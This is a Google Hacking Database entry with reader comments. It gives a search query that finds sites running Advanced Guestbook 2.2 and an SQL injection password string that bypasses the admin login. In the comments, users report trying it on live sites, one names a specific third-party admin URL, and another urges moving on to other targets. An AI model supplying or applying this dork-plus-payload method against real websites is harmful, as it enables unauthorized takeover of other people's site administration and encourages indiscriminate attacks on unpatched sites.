GHDB

Google Search: intitle:guestbook “advanced guestbook 2.2 powered”

ThrowedOff rates this entry 6 out of 10.
Submitted: 2004-05-12 00:00:00
Added by: ThrowedOff
Hits: 10749
Score: 6

Advanced Guestbook v2.2 has an SQL injection problem which allows unauthorized access. AttackerFrom there, hit “Admin” then do the following:Leave username field blank.For password, enter this exactly:’) OR (‘a’ = ‘aYou are now in the Guestbook’s Admin section.http://www.securityfocus.com/bid/10209


Comments:

2004-05-27 18:29:44 (Anonymous):
I’m quite amazed that such a simple sql injection still works on so many sites nowadays. It will work with just about /every/ result that google pulls up

2004-05-30 09:53:12 (Fr0zen):
This works perfectly, but i see i was not the first who has already tried it :)

2004-12-25 10:51:00 (vinny):
Yeah, Sorry but i’m a noob and it’s maby stupid
but it’s not working by me.
What do i wrong ?

I search i google ? then exampl:
http://benjaminroldan.com/forum/admin.php
then i leave the username emty
en for the password i fill: ‘) OR (‘a’ = ‘a (between the // in).

and i get an error Access Denied ?
Or SQl Error ?

Wat i doing wrong ?
Ps: Srry for my bad english

2005-08-18 20:43:18 (JTR000):
that one site was secured against it.
try others.